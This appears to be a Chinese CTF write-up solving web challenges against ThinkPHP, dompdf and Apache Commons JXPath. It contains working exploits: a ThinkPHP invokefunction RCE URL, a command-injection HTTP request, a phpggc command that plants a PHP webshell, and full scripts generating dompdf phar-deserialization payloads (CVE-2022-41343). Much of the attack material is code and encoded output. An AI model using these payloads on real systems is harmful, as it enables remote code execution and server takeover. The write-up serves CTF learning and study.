乘着大佬都去打阿里云CTF偷偷拿个第一

image-20230424191613543

pdf_converter

非预期解的,直接上 ThinkPHP V5.0.21 的RCE POC就能打通

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

1280X1280

你听说过 js 的 webshell 吗

题目给了提示说有信息泄露

先F12看看

有一些接口

/v3/UpdateAllProduct
/v2/coding/projectList
/v2/coding/distList
/v2/coding/versionList
/v2/coding/distExist

这个 /v3/UpdateAllProduct 看起来很可疑

1280X1280(1)

尝试修改发包无果

1280X1280(2)

提示说扫一下,那扫扫目录看

[11:39:19] 200 -  679B  - /app.js
[11:39:28] 200 -  439B  - /config.js
[11:39:34] 200 -  147B  - /Dockerfile
[11:39:59] 200 -  627B  - /package.json
[11:39:59] 200 -   64KB - /package-lock.json
[11:40:08] 200 -   34B  - /README.md

访问,根据已有的信息把所有源码爬下来(根据每个js文件中require方法引入的文件路径和当前路径位置就能找到所有源码文件)

审计发现 /app/api/v3/UpdateAllProduct.js 中有很明显的命令注入

1280X1280(3)

发现可以执行命令,但靶机似乎不出网,官方wp给出的是用无回显的布尔盲注或者写webshell js 来进行 Getshell,我这方法单纯就是为了拿flag。

既然/app/目录下的文件是可以直接访问的,所以我这里是直接用命令注入将flag写入 /app/ 目录即可

POST /v3/UpdateAllProduct HTTP/1.1
Host: 114.117.174.147:18882
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Referer: http://114.117.174.147:18886/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
x-coding-event: pingaaa
Content-Length: 140

{"artifact":{"artifactRepoName":1,
"artifactPkgName":";cat /flag/flag.txt>/app/pankas666123.js",
"artifactVersionName":1,"projectName":1}}

c1c4332e-2ce4-46de-95a9-c62b0b4f5de9

pdf_converter_revenge

把上面那个pdf_converter的RCE漏洞修了,但测试发现仍然存在反序列化漏洞,可利用thinkPHP 5.0.24的反序列化漏洞打RCE

这题如果是自己一个人分析的话确实有点难度,但网上有一大堆文章可以参考

参考 https://tantosec.com/blog/cve-2022-41343/

参考这个按流程来打就能打通,上面的文章对漏洞原理进行了深入的分析,这里不再赘述

generate_font.py

#!/usr/bin/env python3
import fontforge
import os
import sys
import tempfile
from typing import Optional

def main():
    sys.stdout.buffer.write(do_generate_font())

def do_generate_font() -> bytes:
    fd, fn = tempfile.mkstemp(suffix=".ttf")
    os.close(fd)
    font = fontforge.font()
    font.copyright = "DUMMY FONT"
    font.generate(fn)
    with open(fn, "rb") as f:
        res = f.read()
    os.unlink(fn)
    result = res
    return result

if __name__ == "__main__":
    main()

python3 generate_font.py > font.ttf 生成 font.ttf 文件

然后利用工具 phpgcc 生成 font-polyglot.phar 文件 ,直接用ThinkPHP/RCE2的反序列化payload (这里注意写入的shell文件路径要在public下)

php -d phar.readonly=0 phpggc ThinkPHP/RCE2 system "echo '<?php system(\$_GET[0]); ?>' > /var/www/html/public/shell.php" -p phar -pp font.ttf -o font-polyglot.phar

之后运行脚本

generate_payload.py

#!/usr/bin/env python3
import argparse
import hashlib
import base64
import urllib.parse
import os

PAYLOAD_TEMPLATE_URL_ENCODED = '''
<style>@font-face+{+font-family:'exploit';+src:url('%s');+font-weight:'normal';+font-style:'normal';}</style>
'''
PAYLOAD_TEMPLATE = '''
<style>
    @font-face {
        font-family:'exploit';
        src:url('%s');
        font-weight:'normal';
        font-style:'normal';
    }
</style>
'''

def get_args():
    parser = argparse.ArgumentParser( prog="generate_payload.py",
                      formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
                      epilog= '''
                       This script will generate payloads for CVE-2022-41343
                      ''')
    parser.add_argument("file", help="Polyglot File")
    parser.add_argument("-p", "--path", default="/var/www/", help="Base path to vendor directory (Default = /var/www/)")
    args = parser.parse_args()
    return args

def main():
    args = get_args()
    file = args.file.strip()
    path = args.path.strip()
    if(os.path.exists(file)):
        generate_payloads(file, path)
    else:
        print("ERROR: File doesn't exist.")

def generate_payloads(file, path):
    with open(file, "rb") as f:
        fc = f.read()
    b64 = base64.b64encode(fc)
    data_uri_pure = "data:text/plain;base64,%s" % b64.decode()
    md5 = hashlib.md5(data_uri_pure.encode()).hexdigest()
    data_uri_double_encoded = "data:text/plain;base64,%s" % urllib.parse.quote_plus(urllib.parse.quote_plus(b64.decode()))
    phar_uri = "phar://%s/vendor/dompdf/dompdf/lib/fonts/exploit_normal_%s.ttf##" % (path,md5)
    req1_enc = PAYLOAD_TEMPLATE_URL_ENCODED % data_uri_double_encoded
    req2_enc = PAYLOAD_TEMPLATE_URL_ENCODED % urllib.parse.quote_plus(phar_uri)
    req1_pure = PAYLOAD_TEMPLATE % data_uri_double_encoded
    req2_pure = PAYLOAD_TEMPLATE % phar_uri
    print("====== REQUEST 1 ENCODED =======")
    print(req1_enc)
    print("====== REQUEST 2 ENCODED =======")
    print(req2_enc)
    print("====== REQUEST 1 NOT ENCODED =======")
    print(req1_pure)
    print("====== REQUEST 2 NOT ENCODED =======")
    print(req2_pure)

if __name__ == "__main__":
    main()

python3 generate_payload.py -p "/var/www/html" font-polyglot.phar 生成payload

python generate_payload.py -p "/var/www/html" font-polyglot.phar
====== REQUEST 1 ENCODED =======

<style>@font-face+{+font-family:'exploit';+src:url('data:text/plain;base64,AAEAAAANAIAAAwBQRkZUTZtZ7%252FYAAAV0AAAAHE9TLzJVeV76AAABWAAAAGBjbWFwAA0DlgAAAcQAAAE6Y3Z0IAAhAnkAAAMAAAAABGdhc3D%252F%252FwADAAAFbAAAAAhnbHlmPaWWPgAAAwwAAABUaGVhZCE7w%252BUAAADcAAAANmhoZWEEIAAAAAABFAAAACRobXR4ArkAIQAAAbgAAAAMbG9jYQAqAFQAAAMEAAAACG1heHAARwA5AAABOAAAACBuYW1lv%252F3%252FwgAAA2AAAAHmcG9zdP%252B3ADIAAAVIAAAAIgABAAAAAQAAZrXoUF8PPPUACwPoAAAAAOBpQDMAAAAA4GlAMwAhAAABKgKaAAAACAACAAAAAAAAAAEAAAKaAAAAWgAAAAD%252F%252FwEqAAEAAAAAAAAAAAAAAAAAAAAAAAEAAAADAAgAAgAAAAAAAgAAAAEAAQAAAEAALgAAAAAABAH0AZAABQAAAooCvAAAAIwCigK8AAAB4AAxAQIAAAIABQMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUGZFZACA%252F%252F8AAAMg%252FzgAWgKaAAAAAAABAAAAAAAAAAAAAAAgAAEBbAAhAAAAAAFNAAAAAAADAAAAAwAAABwAAQAAAAAANAADAAEAAAAcAAQAGAAAAAIAAgAAAAD%252F%252FwAA%252F%252F8AAQAAAAABBgAAAQAAAAAAAAABAgAAAAIAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACECeQAAACoAKgAqAAIAIQAAASoCmgADAAcALrEBAC88sgcEAO0ysQYF3DyyAwIA7TIAsQMALzyyBQQA7TKyBwYB%252FDyyAQIA7TIzESERJzMRIyEBCejHxwKa%252FWYhAlgAAAAADgCuAAEAAAAAAAAACgAWAAEAAAAAAAEACQA1AAEAAAAAAAIABwBPAAEAAAAAAAMAJQCjAAEAAAAAAAQACQDdAAEAAAAAAAUAEAEJAAEAAAAAAAYACQEuAAMAAQQJAAAAFAAAAAMAAQQJAAEAEgAhAAMAAQQJAAIADgA%252FAAMAAQQJAAMASgBXAAMAAQQJAAQAEgDJAAMAAQQJAAUAIADnAAMAAQQJAAYAEgEaAEQAVQBNAE0AWQAgAEYATwBOAFQAAERVTU1ZIEZPTlQAAFUAbgB0AGkAdABsAGUAZAAxAABVbnRpdGxlZDEAAFIAZQBnAHUAbABhAHIAAFJlZ3VsYXIAAEYAbwBuAHQARgBvAHIAZwBlACAAMgAuADAAIAA6ACAAVQBuAHQAaQB0AGwAZQBkADEAIAA6ACAAMgAyAC0ANAAtADIAMAAyADMAAEZvbnRGb3JnZSAyLjAgOiBVbnRpdGxlZDEgOiAyMi00LTIwMjMAAFUAbgB0AGkAdABsAGUAZAAxAABVbnRpdGxlZDEAAFYAZQByAHMAaQBvAG4AIAAwADAAMQAuADAAMAAwACAAAFZlcnNpb24gMDAxLjAwMCAAAFUAbgB0AGkAdABsAGUAZAAxAABVbnRpdGxlZDEAAAAAAgAAAAAAAP%252B1ADIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB%252F%252F8AAgAAAAEAAAAA2odvjwAAAADgaUAzAAAAAOBpQDM8P3BocCBfX0hBTFRfQ09NUElMRVIoKTsgPz4NCnkKAAABAAAAEQAAAAEAAAAAAEMKAABPOjI3OiJ0aGlua1xwcm9jZXNzXHBpcGVzXFdpbmRvd3MiOjE6e3M6MzQ6IgB0aGlua1xwcm9jZXNzXHBpcGVzXFdpbmRvd3MAZmlsZXMiO2E6MTp7aTowO086MTc6InRoaW5rXG1vZGVsXFBpdm90Ijo1OntzOjk6IgAqAGFwcGVuZCI7YToxOntpOjA7czo4OiJnZXRFcnJvciI7fXM6ODoiACoAZXJyb3IiO086Mjc6InRoaW5rXG1vZGVsXHJlbGF0aW9uXEhhc09uZSI6Mzp7czoxNToiACoAc2VsZlJlbGF0aW9uIjtiOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjI6e3M6MTA6IgAqAGhhbmRsZXIiO086Mjc6InRoaW5rXGNhY2hlXGRyaXZlclxNZW1jYWNoZSI6Mzp7czoxMDoiACoAb3B0aW9ucyI7YTo1OntzOjY6ImV4cGlyZSI7aTowO3M6MTI6ImNhY2hlX3N1YmRpciI7YjowO3M6NjoicHJlZml4IjtzOjA6IiI7czo0OiJwYXRoIjtzOjA6IiI7czoxMzoiZGF0YV9jb21wcmVzcyI7YjowO31zOjEwOiIAKgBoYW5kbGVyIjtPOjEzOiJ0aGlua1xSZXF1ZXN0IjoyOntzOjY6IgAqAGdldCI7YToxOntzOjE4OiJIRVhFTlM8Z2V0QXR0cj5ubzwiO3M6NjY6ImVjaG8gJzw%252FcGhwIHN5c3RlbSgkX0dFVFswXSk7ID8%252BJyA%252BIC92YXIvd3d3L2h0bWwvcHVibGljL3NoZWxsLnBocCI7fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7fXM6NjoiACoAdGFnIjtiOjE7fXM6OToiACoAY29uZmlnIjthOjc6e3M6NDoiaG9zdCI7czo5OiIxMjcuMC4wLjEiO3M6NDoicG9ydCI7aToxMTIxMTtzOjY6ImV4cGlyZSI7aTozNjAwO3M6NzoidGltZW91dCI7aTowO3M6MTI6InNlc3Npb25fbmFtZSI7czo2OiJIRVhFTlMiO3M6ODoidXNlcm5hbWUiO3M6MDoiIjtzOjg6InBhc3N3b3JkIjtzOjA6IiI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fX1zOjExOiIAKgBiaW5kQXR0ciI7YToyOntpOjA7czoyOiJubyI7aToxO3M6MzoiMTIzIjt9fXM6OToiACoAcGFyZW50IjtPOjIwOiJ0aGlua1xjb25zb2xlXE91dHB1dCI6Mjp7czoyODoiAHRoaW5rXGNvbnNvbGVcT3V0cHV0AGhhbmRsZSI7TzozMDoidGhpbmtcc2Vzc2lvblxkcml2ZXJcTWVtY2FjaGVkIjoyOntzOjEwOiIAKgBoYW5kbGVyIjtPOjI3OiJ0aGlua1xjYWNoZVxkcml2ZXJcTWVtY2FjaGUiOjM6e3M6MTA6IgAqAG9wdGlvbnMiO2E6NTp7czo2OiJleHBpcmUiO2k6MDtzOjEyOiJjYWNoZV9zdWJkaXIiO2I6MDtzOjY6InByZWZpeCI7czowOiIiO3M6NDoicGF0aCI7czowOiIiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czoxMDoiACoAaGFuZGxlciI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mjp7czo2OiIAKgBnZXQiO2E6MTp7czoxODoiSEVYRU5TPGdldEF0dHI%252Bbm88IjtzOjY2OiJlY2hvICc8P3BocCBzeXN0ZW0oJF9HRVRbMF0pOyA%252FPicgPiAvdmFyL3d3dy9odG1sL3B1YmxpYy9zaGVsbC5waHAiO31zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO31zOjY6IgAqAHRhZyI7YjoxO31zOjk6IgAqAGNvbmZpZyI7YTo3OntzOjQ6Imhvc3QiO3M6OToiMTI3LjAuMC4xIjtzOjQ6InBvcnQiO2k6MTEyMTE7czo2OiJleHBpcmUiO2k6MzYwMDtzOjc6InRpbWVvdXQiO2k6MDtzOjEyOiJzZXNzaW9uX25hbWUiO3M6NjoiSEVYRU5TIjtzOjg6InVzZXJuYW1lIjtzOjA6IiI7czo4OiJwYXNzd29yZCI7czowOiIiO319czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX1zOjE1OiIAKgBzZWxmUmVsYXRpb24iO2I6MDtzOjg6IgAqAHF1ZXJ5IjtPOjE0OiJ0aGlua1xkYlxRdWVyeSI6MTp7czo4OiIAKgBtb2RlbCI7TzoyMDoidGhpbmtcY29uc29sZVxPdXRwdXQiOjI6e3M6Mjg6IgB0aGlua1xjb25zb2xlXE91dHB1dABoYW5kbGUiO086MzA6InRoaW5rXHNlc3Npb25cZHJpdmVyXE1lbWNhY2hlZCI6Mjp7czoxMDoiACoAaGFuZGxlciI7TzoyNzoidGhpbmtcY2FjaGVcZHJpdmVyXE1lbWNhY2hlIjozOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6MDoiIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6MTA6IgAqAGhhbmRsZXIiO086MTM6InRoaW5rXFJlcXVlc3QiOjI6e3M6NjoiACoAZ2V0IjthOjE6e3M6MTg6IkhFWEVOUzxnZXRBdHRyPm5vPCI7czo2NjoiZWNobyAnPD9waHAgc3lzdGVtKCRfR0VUWzBdKTsgPz4nID4gL3Zhci93d3cvaHRtbC9wdWJsaWMvc2hlbGwucGhwIjt9czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjt9czo2OiIAKgB0YWciO2I6MTt9czo5OiIAKgBjb25maWciO2E6Nzp7czo0OiJob3N0IjtzOjk6IjEyNy4wLjAuMSI7czo0OiJwb3J0IjtpOjExMjExO3M6NjoiZXhwaXJlIjtpOjM2MDA7czo3OiJ0aW1lb3V0IjtpOjA7czoxMjoic2Vzc2lvbl9uYW1lIjtzOjY6IkhFWEVOUyI7czo4OiJ1c2VybmFtZSI7czowOiIiO3M6ODoicGFzc3dvcmQiO3M6MDoiIjt9fXM6OToiACoAc3R5bGVzIjthOjE6e2k6MDtzOjc6ImdldEF0dHIiO319fX19fQgAAAB0ZXN0LnR4dAQAAABW%252BERkBAAAAAx%252Bf9ikAQAAAAAAAHRlc3TrzinBBTkpR7dVRceOm%252BRIwB0y%252BgIAAABHQk1C');+font-weight:'normal';+font-style:'normal';}</style>

====== REQUEST 2 ENCODED =======

<style>@font-face+{+font-family:'exploit';+src:url('phar%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fvendor%2Fdompdf%2Fdompdf%2Flib%2Ffonts%2Fexploit_normal_db71f18fd6e780a597c6ddf93c13f7dc.ttf%23%23');+font-weight:'normal';+font-style:'normal';}</style>

====== REQUEST 1 NOT ENCODED =======

<style>
    @font-face {
        font-family:'exploit';
        src:url('data:text/plain;base64,AAEAAAANAIAAAwBQRkZUTZtZ7%252FYAAAV0AAAAHE9TLzJVeV76AAABWAAAAGBjbWFwAA0DlgAAAcQAAAE6Y3Z0IAAhAnkAAAMAAAAABGdhc3D%252F%252FwADAAAFbAAAAAhnbHlmPaWWPgAAAwwAAABUaGVhZCE7w%252BUAAADcAAAANmhoZWEEIAAAAAABFAAAACRobXR4ArkAIQAAAbgAAAAMbG9jYQAqAFQAAAMEAAAACG1heHAARwA5AAABOAAAACBuYW1lv%252F3%252FwgAAA2AAAAHmcG9zdP%252B3ADIAAAVIAAAAIgABAAAAAQAAZrXoUF8PPPUACwPoAAAAAOBpQDMAAAAA4GlAMwAhAAABKgKaAAAACAACAAAAAAAAAAEAAAKaAAAAWgAAAAD%252F%252FwEqAAEAAAAAAAAAAAAAAAAAAAAAAAEAAAADAAgAAgAAAAAAAgAAAAEAAQAAAEAALgAAAAAABAH0AZAABQAAAooCvAAAAIwCigK8AAAB4AAxAQIAAAIABQMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUGZFZACA%252F%252F8AAAMg%252FzgAWgKaAAAAAAABAAAAAAAAAAAAAAAgAAEBbAAhAAAAAAFNAAAAAAADAAAAAwAAABwAAQAAAAAANAADAAEAAAAcAAQAGAAAAAIAAgAAAAD%252F%252FwAA%252F%252F8AAQAAAAABBgAAAQAAAAAAAAABAgAAAAIAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACECeQAAACoAKgAqAAIAIQAAASoCmgADAAcALrEBAC88sgcEAO0ysQYF3DyyAwIA7TIAsQMALzyyBQQA7TKyBwYB%252FDyyAQIA7TIzESERJzMRIyEBCejHxwKa%252FWYhAlgAAAAADgCuAAEAAAAAAAAACgAWAAEAAAAAAAEACQA1AAEAAAAAAAIABwBPAAEAAAAAAAMAJQCjAAEAAAAAAAQACQDdAAEAAAAAAAUAEAEJAAEAAAAAAAYACQEuAAMAAQQJAAAAFAAAAAMAAQQJAAEAEgAhAAMAAQQJAAIADgA%252FAAMAAQQJAAMASgBXAAMAAQQJAAQAEgDJAAMAAQQJAAUAIADnAAMAAQQJAAYAEgEaAEQAVQBNAE0AWQAgAEYATwBOAFQAAERVTU1ZIEZPTlQAAFUAbgB0AGkAdABsAGUAZAAxAABVbnRpdGxlZDEAAFIAZQBnAHUAbABhAHIAAFJlZ3VsYXIAAEYAbwBuAHQARgBvAHIAZwBlACAAMgAuADAAIAA6ACAAVQBuAHQAaQB0AGwAZQBkADEAIAA6ACAAMgAyAC0ANAAtADIAMAAyADMAAEZvbnRGb3JnZSAyLjAgOiBVbnRpdGxlZDEgOiAyMi00LTIwMjMAAFUAbgB0AGkAdABsAGUAZAAxAABVbnRpdGxlZDEAAFYAZQByAHMAaQBvAG4AIAAwADAAMQAuADAAMAAwACAAAFZlcnNpb24gMDAxLjAwMCAAAFUAbgB0AGkAdABsAGUAZAAxAABVbnRpdGxlZDEAAAAAAgAAAAAAAP%252B1ADIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB%252F%252F8AAgAAAAEAAAAA2odvjwAAAADgaUAzAAAAAOBpQDM8P3BocCBfX0hBTFRfQ09NUElMRVIoKTsgPz4NCnkKAAABAAAAEQAAAAEAAAAAAEMKAABPOjI3OiJ0aGlua1xwcm9jZXNzXHBpcGVzXFdpbmRvd3MiOjE6e3M6MzQ6IgB0aGlua1xwcm9jZXNzXHBpcGVzXFdpbmRvd3MAZmlsZXMiO2E6MTp7aTowO086MTc6InRoaW5rXG1vZGVsXFBpdm90Ijo1OntzOjk6IgAqAGFwcGVuZCI7YToxOntpOjA7czo4OiJnZXRFcnJvciI7fXM6ODoiACoAZXJyb3IiO086Mjc6InRoaW5rXG1vZGVsXHJlbGF0aW9uXEhhc09uZSI6Mzp7czoxNToiACoAc2VsZlJlbGF0aW9uIjtiOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjI6e3M6MTA6IgAqAGhhbmRsZXIiO086Mjc6InRoaW5rXGNhY2hlXGRyaXZlclxNZW1jYWNoZSI6Mzp7czoxMDoiACoAb3B0aW9ucyI7YTo1OntzOjY6ImV4cGlyZSI7aTowO3M6MTI6ImNhY2hlX3N1YmRpciI7YjowO3M6NjoicHJlZml4IjtzOjA6IiI7czo0OiJwYXRoIjtzOjA6IiI7czoxMzoiZGF0YV9jb21wcmVzcyI7YjowO31zOjEwOiIAKgBoYW5kbGVyIjtPOjEzOiJ0aGlua1xSZXF1ZXN0IjoyOntzOjY6IgAqAGdldCI7YToxOntzOjE4OiJIRVhFTlM8Z2V0QXR0cj5ubzwiO3M6NjY6ImVjaG8gJzw%252FcGhwIHN5c3RlbSgkX0dFVFswXSk7ID8%252BJyA%252BIC92YXIvd3d3L2h0bWwvcHVibGljL3NoZWxsLnBocCI7fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7fXM6NjoiACoAdGFnIjtiOjE7fXM6OToiACoAY29uZmlnIjthOjc6e3M6NDoiaG9zdCI7czo5OiIxMjcuMC4wLjEiO3M6NDoicG9ydCI7aToxMTIxMTtzOjY6ImV4cGlyZSI7aTozNjAwO3M6NzoidGltZW91dCI7aTowO3M6MTI6InNlc3Npb25fbmFtZSI7czo2OiJIRVhFTlMiO3M6ODoidXNlcm5hbWUiO3M6MDoiIjtzOjg6InBhc3N3b3JkIjtzOjA6IiI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fX1zOjExOiIAKgBiaW5kQXR0ciI7YToyOntpOjA7czoyOiJubyI7aToxO3M6MzoiMTIzIjt9fXM6OToiACoAcGFyZW50IjtPOjIwOiJ0aGlua1xjb25zb2xlXE91dHB1dCI6Mjp7czoyODoiAHRoaW5rXGNvbnNvbGVcT3V0cHV0AGhhbmRsZSI7TzozMDoidGhpbmtcc2Vzc2lvblxkcml2ZXJcTWVtY2FjaGVkIjoyOntzOjEwOiIAKgBoYW5kbGVyIjtPOjI3OiJ0aGlua1xjYWNoZVxkcml2ZXJcTWVtY2FjaGUiOjM6e3M6MTA6IgAqAG9wdGlvbnMiO2E6NTp7czo2OiJleHBpcmUiO2k6MDtzOjEyOiJjYWNoZV9zdWJkaXIiO2I6MDtzOjY6InByZWZpeCI7czowOiIiO3M6NDoicGF0aCI7czowOiIiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czoxMDoiACoAaGFuZGxlciI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mjp7czo2OiIAKgBnZXQiO2E6MTp7czoxODoiSEVYRU5TPGdldEF0dHI%252Bbm88IjtzOjY2OiJlY2hvICc8P3BocCBzeXN0ZW0oJF9HRVRbMF0pOyA%252FPicgPiAvdmFyL3d3dy9odG1sL3B1YmxpYy9zaGVsbC5waHAiO31zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO31zOjY6IgAqAHRhZyI7YjoxO31zOjk6IgAqAGNvbmZpZyI7YTo3OntzOjQ6Imhvc3QiO3M6OToiMTI3LjAuMC4xIjtzOjQ6InBvcnQiO2k6MTEyMTE7czo2OiJleHBpcmUiO2k6MzYwMDtzOjc6InRpbWVvdXQiO2k6MDtzOjEyOiJzZXNzaW9uX25hbWUiO3M6NjoiSEVYRU5TIjtzOjg6InVzZXJuYW1lIjtzOjA6IiI7czo4OiJwYXNzd29yZCI7czowOiIiO319czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX1zOjE1OiIAKgBzZWxmUmVsYXRpb24iO2I6MDtzOjg6IgAqAHF1ZXJ5IjtPOjE0OiJ0aGlua1xkYlxRdWVyeSI6MTp7czo4OiIAKgBtb2RlbCI7TzoyMDoidGhpbmtcY29uc29sZVxPdXRwdXQiOjI6e3M6Mjg6IgB0aGlua1xjb25zb2xlXE91dHB1dABoYW5kbGUiO086MzA6InRoaW5rXHNlc3Npb25cZHJpdmVyXE1lbWNhY2hlZCI6Mjp7czoxMDoiACoAaGFuZGxlciI7TzoyNzoidGhpbmtcY2FjaGVcZHJpdmVyXE1lbWNhY2hlIjozOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6MDoiIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6MTA6IgAqAGhhbmRsZXIiO086MTM6InRoaW5rXFJlcXVlc3QiOjI6e3M6NjoiACoAZ2V0IjthOjE6e3M6MTg6IkhFWEVOUzxnZXRBdHRyPm5vPCI7czo2NjoiZWNobyAnPD9waHAgc3lzdGVtKCRfR0VUWzBdKTsgPz4nID4gL3Zhci93d3cvaHRtbC9wdWJsaWMvc2hlbGwucGhwIjt9czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjt9czo2OiIAKgB0YWciO2I6MTt9czo5OiIAKgBjb25maWciO2E6Nzp7czo0OiJob3N0IjtzOjk6IjEyNy4wLjAuMSI7czo0OiJwb3J0IjtpOjExMjExO3M6NjoiZXhwaXJlIjtpOjM2MDA7czo3OiJ0aW1lb3V0IjtpOjA7czoxMjoic2Vzc2lvbl9uYW1lIjtzOjY6IkhFWEVOUyI7czo4OiJ1c2VybmFtZSI7czowOiIiO3M6ODoicGFzc3dvcmQiO3M6MDoiIjt9fXM6OToiACoAc3R5bGVzIjthOjE6e2k6MDtzOjc6ImdldEF0dHIiO319fX19fQgAAAB0ZXN0LnR4dAQAAABW%252BERkBAAAAAx%252Bf9ikAQAAAAAAAHRlc3TrzinBBTkpR7dVRceOm%252BRIwB0y%252BgIAAABHQk1C');        
        font-weight:'normal';
        font-style:'normal';
    }
</style>

====== REQUEST 2 NOT ENCODED =======

<style>
    @font-face {
        font-family:'exploit';
        src:url('phar:///var/www/html/vendor/dompdf/dompdf/lib/fonts/exploit_normal_db71f18fd6e780a597c6ddf93c13f7dc.ttf##');
        font-weight:'normal';
        font-style:'normal';
    }
</style>

image-20230423172950038

注意上面有个问题,写入 /var/www/html/vendor/dompdf/dompdf/lib/fonts 中的文件名是 exploit_norml_md5(data:text/plain;base64,exp).ttf 这种格式,但python脚本生成的名字和php生成的不一样,最好本地起个环境看下,当时也是因为这个搞没出。

ezjxpath

又是我不怎么会的java题,java这关还是要过的。

public String hack(@RequestParam(name = "query",required = true) String query) throws Exception {
    try {
        Waf waf = new Waf();
        if (!waf.check(query)) {
            return "try harder";
        } else {
            JXPathContext context = JXPathContext.newContext((Object)null);
            context.getValue(query);
            return "good job!";
        }
    } catch (Exception var4) {
        return "some thing wrong?";
    }
}

使用了 JXPathContext 这东西有洞 CVE-2022-41852

参考 https://xz.aliyun.com/t/11769

可以创建对象,执行静态方法和普通方法,具体如何使用参考上面的链接。

waf直接ban了这些

"java.lang", "Runtime", "org.springframework", "javax.naming", "Process", "ScriptEngineManager"

而却运行环境必须要求完整的类名才可以,这下想反射绕过也不行了

方法1

官方wp是使用了bcel写入内存马

相关BCEL的文章参考 https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html

提供com.sun.org.apache.bcel.internal.util.JavaWrapper

其new方法可以进行一个bcel的加载

直接写内存马

POST

Header: cmd:cat /flag

